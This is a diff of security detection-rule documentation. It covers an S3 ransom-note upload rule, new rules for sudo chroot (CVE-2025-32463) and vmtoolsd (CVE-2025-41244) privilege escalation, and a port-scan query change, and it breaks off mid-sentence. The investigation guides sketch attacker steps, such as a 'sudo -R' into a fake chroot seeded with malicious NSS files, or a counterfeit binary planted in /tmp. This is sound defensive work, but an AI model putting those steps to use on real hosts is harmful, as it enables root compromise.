GuardDuty S3-related findings, AWS Config drift on the bucket and its policy, and any SOAR/IR runbook executions tied to ransomware triage. *False Positive Analysis:* - -- **Legitimate Administrative Actions**: Confirm if the `PutObject` action aligns with scheduled updates, maintenance activities, or legitimate administrative tasks documented in change management systems. -- **Consistency Check**: Compare the action against historical data of similar activities performed by the user or within the organization. If the action is consistent with past legitimate activities, it might indicate a false alarm. -- **Verify through Outcomes**: Check the `aws.cloudtrail.response_elements` and the `event.outcome` to confirm if the upload was successful and intended according to policy. +- **Planned tests or red-team exercises.** Confirm change tickets or test windows for staging/dev buckets; red teams often drop “ransom-note-like” files during exercises. +- **Benign automation naming.** Some data-migration or backup tools may use “readme”/“recovery”-style filenames; validate by `user.agent`, principal, and target environment (dev vs prod). +- **Log/archive buckets.** Exclude infrastructure/logging buckets (for example, `AWSLogs`, CloudTrail, access logs) per rule guidance to reduce noise. *Response and Remediation:* -- **Immediate Review and Reversal if Necessary**: If the activity was unauthorized, remove the uploaded ransom notes from the S3 bucket and review the bucket's access logs for any suspicious activity. -- **Enhance Monitoring and Alerts**: Adjust monitoring systems to alert on similar `PutObject` actions, especially those involving sensitive data or unusual file extensions. -- **Educate and Train**: Provide additional training to users with administrative rights on the importance of security best practices concerning S3 bucket management and the risks of ransomware. -- **Audit S3 Bucket Policies and Permissions**: Conduct a comprehensive audit of all S3 bucket policies and associated permissions to ensure they adhere to the principle of least privilege. -- **Incident Response**: If there's an indication of malicious intent or a security breach, initiate the incident response protocol to mitigate any damage and prevent future occurrences. +**1. Immediate, low-risk actions (safe for most environments)** +- **Preserve context:** Export the triggering `PutObject` CloudTrail record(s), plus 15–30 min before/after, to an evidence bucket (restricted access). +- **Snapshot configuration:** Record current bucket settings (Block Public Access, Versioning, Object Lock, Bucket Policy, Lifecycle rules) and any KMS keys used. +- **Quiet the spread:** Pause destructive automation: disable/bypass lifecycle rules that would expire/delete object versions; temporarily pause data pipelines targeting the bucket. +- **Notify owners:** Inform the bucket/application owner(s) and security leadership. +**2. Containment options (choose the least disruptive first)** +- **Harden exposure:** If not already enforced, enable `Block Public Access` for the bucket. +- **Targeted deny policy (temporary):** Add a restrictive bucket policy allowing only IR/admin roles while you scope impact. Reconfirm critical workload dependencies before applying. +- **Credential risk reduction:** If a specific IAM user/key or role is implicated, rotate access keys; for roles, remove risky policy attachments or temporarily restrict with an SCP/deny statement. -*Additional Information:* +**3. Evidence preservation** +- Export relevant CloudTrail events, S3 server/access logs (if enabled), AWS Config history for the bucket/policy, and the suspicious object plus its previous versions (if Versioning is enabled). +- Document actor ARN, source IPs, user agent(s), exact `bucketName`/`key`, and timestamps. Maintain a simple chain-of-custody note for collected artifacts. + +**4. Scope and hunting (same actor/time window)** +- Look for `DeleteObject(s)`, unusual `PutObject` volume, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning` changes, `PutBucketLifecycleConfiguration`, and cross-account access. +- Cross reference other buckets touched by the same actor/IP; recent IAM changes (new keys, policy/role edits); GuardDuty findings tied to S3/credentials. +**5. Recovery (prioritize data integrity)** +- If Versioning is enabled, restore last known-good versions for impacted objects. Consider applying Object Lock legal hold to clean versions during recovery if configured. +- If Versioning is not enabled, recover from backups (AWS Backup, replication targets). Enable Versioning going forward on critical buckets; evaluate Object Lock for high-value data. +- Carefully remove any temporary deny policy only after credentials are rotated, policies re-validated, and no ongoing destructive activity is observed. -For further guidance on managing S3 bucket security and protecting against ransomware, refer to the https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html[AWS S3 documentation] and AWS best practices for security. Additionally, consult the following resources for specific details on S3 ransomware protection: -- https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf[ERMETIC REPORT - AWS S3 Ransomware Exposure in the Wild] -- https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/[AWS S3 Ransomware Batch Deletion] -- https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/[S3 Ransomware Part 1: Attack Vector] +**6. Post-incident hardening** +- Enforce `Block Public Access`, enable Versioning (and MFA-Delete where appropriate), and review bucket policies for least privilege. +- Ensure continuous CloudTrail data events for S3 are enabled in covered regions; enable/verify GuardDuty S3 protections and alerts routing. +- Add detections for related behaviors (policy tampering, bulk deletes, versioning/lifecycle toggles) and create allowlists for known maintenance windows. + +**7. Communication & escalation** +- If you have an IR team/provider: escalate with the evidence bundle and a summary (bucket/key, actor, protections, related activity, business impact). +- If you do not have an IR team: designate an internal incident lead, track actions/time, and follow these steps conservatively. Favor reversible controls (temporary deny, key rotation) over invasive changes. + + +*Additional Information:* + +- For further guidance on managing S3 bucket security and protecting against ransomware, refer to the https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html[AWS S3 documentation] and AWS best practices for security. +- https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-Ransomware.md[AWS IRP—Ransomware] (NIST-aligned template for evidence, containment, eradication, recovery, post-incident). +- https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Ransom_Response_S3.md[AWS Customer Playbook—Ransom Response (S3)] (bucket-level response steps: public access blocks, temporary deny, versioning/object lock, lifecycle considerations, recovery). ==== Setup -AWS S3 data types need to be enabled in the CloudTrail trail configuration. +AWS S3 data types need to be enabled in the CloudTrail trail configuration to capture PutObject API calls. ==== Rule query [source, js] ---------------------------------- -from logs-aws.cloudtrail-* - -// any successful uploads via S3 API requests -| where - event.dataset == "aws.cloudtrail" - and event.provider == "s3.amazonaws.com" - and event.action == "PutObject" - and event.outcome == "success" - -// extract object key from API request parameters -| dissect aws.cloudtrail.request_parameters "%{?ignore_values}key=%{Esql.aws_cloudtrail_request_parameters_object_key}}" - -// regex match against common ransomware naming patterns -| where - Esql.aws_cloudtrail_request_parameters_object_key rlike "(.*)(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue)(.*)" - and not Esql.aws_cloudtrail_request_parameters_object_key rlike "(.*)(AWSLogs|CloudTrail|access-logs)(.*)" - -// keep relevant ECS and derived fields -| keep - tls.client.server_name, - aws.cloudtrail.user_identity.arn, - Esql.aws_cloudtrail_request_parameters_object_key - -// aggregate by server name, actor, and object key -| stats - Esql.event_count = count(*) - by - tls.client.server_name, - aws.cloudtrail.user_identity.arn, - Esql.aws_cloudtrail_request_parameters_object_key - -// filter for rare single uploads (likely test/detonation) -| where Esql.event_count == 1 +file where + event.dataset == "aws.cloudtrail" and + event.provider == "s3.amazonaws.com" and + event.action == "PutObject" and + event.outcome == "success" and + /* Apply regex to match patterns only after the bucket name */ + aws.cloudtrail.resources.arn regex "arn:aws:s3:::[^/]+/.*?(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue).*" and + not aws.cloudtrail.resources.arn regex ".*(AWSLogs|CloudTrail|access-logs).*" ---------------------------------- @@ -151,3 +153,7 @@ from logs-aws.cloudtrail-* ** Name: Data Destruction ** ID: T1485 ** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc new file mode 100644 index 0000000000..f15419a8b5 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc @@ -0,0 +1,159 @@ +[[potential-cve-2025-32463-nsswitch-file-creation]] +=== Potential CVE-2025-32463 Nsswitch File Creation + +Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Nsswitch File Creation* + + +This rule flags creation of an nsswitch.conf file outside the standard /etc location by a shell, an early sign of staging a fake root to coerce sudo's chroot path and hijack NSS resolution (CVE-2025-32463). A common pattern is writing /tmp/chroot/etc/nsswitch.conf, placing or pointing to a malicious NSS module, then running sudo chroot into that directory so name lookups load attacker-controlled code and escalate to root. + + +*Possible investigation steps* + + +- Correlate the event with any sudo or chroot executions within ±10 minutes that reference the same directory prefix (e.g., /tmp/chroot), capturing full command line, user, TTY, working directory, and exit codes. +- Inspect the created nsswitch.conf for nonstandard services or module names and enumerate any libnss_*.so* under lib*/ or usr/lib*/ within that prefix, recording owner, hashes, and timestamps. +- List all contemporaneous file writes under the same prefix (etc, lib*, bin, sbin) to determine whether a chroot rootfs is being assembled and attribute it to a toolchain such as tar, rsync, debootstrap, or custom scripts via process ancestry. +- Search file access telemetry to see whether privileged processes subsequently read that specific nsswitch.conf or loaded libnss_* from the same path, which would indicate the chroot was exercised. +- Verify sudo and glibc versions and patch status for CVE-2025-32463 and collect the initiating user’s session context (SSH source, TTY, shell history) to assess exploitability and scope. + + +*False positive analysis* + + +- An administrator legitimately staging a temporary chroot or test root filesystem may use a shell to create /tmp/*/etc/nsswitch.conf while populating configs, matching the rule even though no privilege escalation is intended. +- OS installation, recovery, or backup-restore workflows run from a shell can populate a mounted target like /mnt/newroot/etc/nsswitch.conf, creating the file outside /etc as part of maintenance and triggering the alert. + + +*Response and remediation* + + +- Terminate any sudo or chroot processes referencing the created path (e.g., /tmp/chroot/etc/nsswitch.conf), lock the initiating user’s sudo access, and quarantine the parent directory with root-only permissions. +- Remove the staged nsswitch.conf and any libnss_*.so* or ld.so.* artifacts under lib*/ or usr/lib*/ within that prefix after collecting copies, hashes, and timestamps for evidence. +- Restore and verify /etc/nsswitch.conf on the host with correct content and root:root 0644, purge temporary chroot roots under /tmp, /var/tmp, or /mnt, and restart nscd or systemd-resolved to flush cached name-service data. +- Escalate to incident response if sudo chroot was executed against the same directory, if root processes loaded libnss_* from that path, or if nsswitch.conf appears outside /etc on multiple hosts within a short window. +- Apply vendor fixes for CVE-2025-32463 to sudo and glibc, disallow chroot in sudoers and enforce env_reset, noexec, and secure_path, and mount /tmp and /var/tmp with noexec,nosuid,nodev to prevent libraries being sourced from user-writable paths. +- Add controls to block execution from user-created chroot trees by policy (AppArmor or SELinux) and create alerts on creation of */etc/nsswitch.conf or libnss_* writes under non-system paths, with auto-isolation for directories under /tmp or a user’s home. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and file.path like "/*/etc/nsswitch.conf" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +not ( + process.name == "dash" and file.path like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc new file mode 100644 index 0000000000..988e591f56 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc @@ -0,0 +1,159 @@ +[[potential-cve-2025-32463-sudo-chroot-execution-attempt]] +=== Potential CVE-2025-32463 Sudo Chroot Execution Attempt + +Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Sudo Chroot Execution Attempt* + + +This rule highlights sudo invoked with the chroot (-R/--chroot) option outside normal administration, a behavior tied to CVE-2025-32463 where attackers force sudo to load attacker-controlled NSS configs or libraries and escalate to root. An attacker pattern: running sudo -R /tmp/fakechroot /bin/sh after seeding that directory with malicious nsswitch.conf and libnss to obtain a root shell. Treat unexpected chrooted sudo on Linux hosts as high-risk privilege escalation activity. + + +*Possible investigation steps* + + +- Extract the chroot target path from the event and enumerate its etc and lib directories for attacker-seeded NSS artifacts (nsswitch.conf, libnss_*, ld.so.preload) and fake passwd/group files, noting recent mtime, ownership, and world-writable files. +- Pivot to file-creation and modification telemetry to identify processes and users that populated that path shortly before execution (e.g., curl, wget, tar, git, gcc), linking them to the invoking user to establish intent. +- Review session and process details to see if a shell or interpreter was launched inside the chroot and whether an euid transition to 0 occurred, indicating a successful privilege escalation. +- Confirm sudo’s package version and build options and the user’s sudoers policy (secure_path/env_* settings and any NOPASSWD allowances) to assess exploitability and whether chroot usage was authorized. +- Collect and preserve the chroot directory contents and relevant audit/log artifacts, and scope by searching for similar chroot invocations or NSS file seeds across the host and fleet. + + +*False positive analysis* + + +- A legitimate offline maintenance session where an administrator chroots into a mounted system under /mnt or /srv using sudo --chroot to run package or initramfs commands, which will trigger when the invoked program is not in the whitelist. +- An image-building or OS bootstrap workflow that stages a root filesystem and uses sudo -R to execute a shell or build/configuration scripts inside the chroot, producing the same pattern from a known user or host context. + + +*Response and remediation* + + +- Immediately isolate the affected host from the network, revoke the invoking user’s sudo privileges, and terminate any chrooted shells or child processes spawned via “sudo -R /bin/sh” or similar executions. +- Preserve evidence and then remove attacker-seeded NSS and loader artifacts within the chroot path—delete or replace nsswitch.conf, libnss_*.so, ld.so.preload, passwd, and group files, and clean up world-writable staging directories like /tmp/fakechroot. +- Upgrade sudo to a fixed build that addresses CVE-2025-32463, and recover by restoring any modified system NSS and loader files from known-good backups while validating ownership, permissions, and hashes. +- Escalate to full incident response if a root shell or process with euid 0 is observed, if /etc/ld.so.preload or /lib/libnss_*.so outside the chroot show unauthorized changes, or if similar “sudo -R” executions appear across multiple hosts. +- Harden by updating sudoers to remove NOPASSWD for chrooted commands, enforce Defaults env_reset and secure_path with noexec, disable “--chroot” usage for non-admin workflows, and monitor for creation of libnss_*.so or nsswitch.conf in non-standard directories. +- Add platform controls by enabling SELinux/AppArmor policies on sudo and the dynamic loader, applying nodev,nosuid,noexec mounts to /tmp and build paths, and setting immutability (chattr +i) on /etc/nsswitch.conf where operationally feasible. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +process.name == "sudo" and process.args in ("-R", "--chroot") and +// To enforce the -R and --chroot arguments to be for sudo specifically, while wildcarding potential full sudo paths +process.command_line like ("*sudo -R*", "*sudo --chroot*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc new file mode 100644 index 0000000000..ea109e2472 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc @@ -0,0 +1,164 @@ +[[potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt]] +=== Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt + +This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt* + + +This rule flags child processes started by vmtoolsd or its version-checking script on Linux, behavior central to CVE-2025-41244 where the service executes external utilities to read version strings. It matters because a local user can coerce these invocations to run arbitrary code with elevated privileges. A typical pattern is dropping a counterfeit lsb_release or rpm in /tmp, modifying PATH, and triggering vmtoolsd/get-versions.sh so the rogue binary executes and spawns a privileged shell or installer. + + +*Possible investigation steps* + + +- Examine the executed child binary’s full path and location, flagging any binaries in writable directories (e.g., /tmp, /var/tmp, /dev/shm, or user home) or masquerading as version utilities (lsb_release, rpm, dpkg, dnf, pacman), and record owner, size, hash, and recent timestamps. +- Pull the parent’s and child’s command-line and environment to confirm PATH ordering and whether writable paths precede system binaries, capturing any evidence that get-versions.sh or vmtoolsd invoked a non-standard utility. +- Pivot to subsequent activity from the child process to see if it spawns an interactive shell, escalates EUID to root, touches /etc/sudoers or /etc/passwd, writes to privileged directories, or opens outbound connections. +- Verify integrity of open-vm-tools components by comparing hashes and file sizes of vmtoolsd and serviceDiscovery scripts with vendor packages (rpm -V or dpkg --verify) and checking for unexpected edits, symlinks, or PATH-hijackable calls within the scripts. +- Correlate filesystem creation events and terminal histories to identify the user who dropped or modified the suspicious binary and whether it appeared shortly before the alert, then assess other hosts for the same filename or hash to determine spread. + + +*False positive analysis* + + +- Routine vmtoolsd service discovery via get-versions.sh during VM boot or periodic guest info refresh can legitimately spawn version/package utilities from standard system paths with a default PATH and no execution from writable directories, yet still match this rule. +- Administrator troubleshooting or post-update validation of open-vm-tools—manually running get-versions.sh or restarting vmtoolsd—can cause a shell to launch the script and start expected system utilities in trusted locations, producing a benign alert. + + +*Response and remediation* + + +- Isolate the affected VM, stop the vmtoolsd service, terminate its spawned children (e.g., lsb_release, rpm, dpkg, or /bin/sh launched via open-vm-tools/serviceDiscovery/scripts/get-versions.sh), and temporarily remove execute permissions from the serviceDiscovery scripts to halt exploitation. +- Quarantine and remove any counterfeit or hijacked utilities and symlinks in writable locations (/tmp, /var/tmp, /dev/shm, or user home) that were executed by vmtoolsd/get-versions.sh, capturing full paths, hashes, owners, and timestamps for evidence. +- Recover by reinstalling open-vm-tools from a trusted repository and verifying integrity of vmtoolsd and serviceDiscovery scripts (rpm -V or dpkg --verify), then restart vmtoolsd only after confirming PATH does not include writable directories and that the scripts call absolute binaries under /usr/bin. +- Escalate to full incident response if a vmtoolsd child executed from a writable path ran with EUID 0, spawned an interactive shell (/bin/sh or /bin/bash), or modified /etc/sudoers or /etc/passwd, and initiate credential rotation and a host-wide compromise assessment. +- Harden hosts by enforcing a safe PATH (e.g., /usr/sbin:/usr/bin:/sbin:/bin), removing writable directories from system and user environment files, mounting /tmp,/var/tmp,/dev/shm with noexec,nosuid,nodev, and applying AppArmor/SELinux policies to block vmtoolsd from executing binaries outside system directories. +- Prevent recurrence by deploying the vendor fix for CVE-2025-41244 across all Linux VMs, pinning or replacing the open-vm-tools serviceDiscovery scripts with versions that use absolute paths, and adding EDR allowlists/blocks so vmtoolsd cannot launch binaries from writable paths. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +( + ( + process.parent.name == "vmtoolsd" + ) or + ( + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + ?process.parent.args like ("/*/open-vm-tools/serviceDiscovery/scripts/get-versions.sh") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc index 94d7a84300..6582036437 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-port-scanning-activity-from-compromised-host.asciidoc @@ -28,7 +28,7 @@ This rule detects potential port scanning activity from a compromised host. Port * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -133,6 +133,8 @@ from logs-endpoint.events.network-* host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and + network.direction == "egress" and + destination.port < 32768 and not ( cidr_match(destination.ip, "127.0.0.0/8", "::1", "FE80::/10", "FF00::/8") or process.executable in ( @@ -155,6 +157,7 @@ from logs-endpoint.events.network-* destination.port, process.executable, destination.ip, + source.ip, agent.id, host.name | stats @@ -162,7 +165,8 @@ from logs-endpoint.events.network-* Esql.destination_port_count_distinct = count_distinct(destination.port), Esql.agent_id_count_distinct = count_distinct(agent.id), Esql.host_name_values = values(host.name), - Esql.agent_id_values = values(agent.id) + Esql.agent_id_values = values(agent.id), + Esql.source_ip_values = values(source.ip) by process.executable, destination.ip | where Esql.agent_id_count_distinct == 1 and diff --git a/docs/detections/prebuilt-rules/rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc new file mode 100644 index 0000000000..4d35802ed0 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-ransomware-behavior-note-files-by-system.asciidoc @@ -0,0 +1,135 @@ +[[potential-ransomware-behavior-note-files-by-system]] +=== Potential Ransomware Behavior - Note Files by System + +This rule identifies the creation of multiple files with same name and over SMB by the same user. This behavior may indicate the successful remote execution of a ransomware 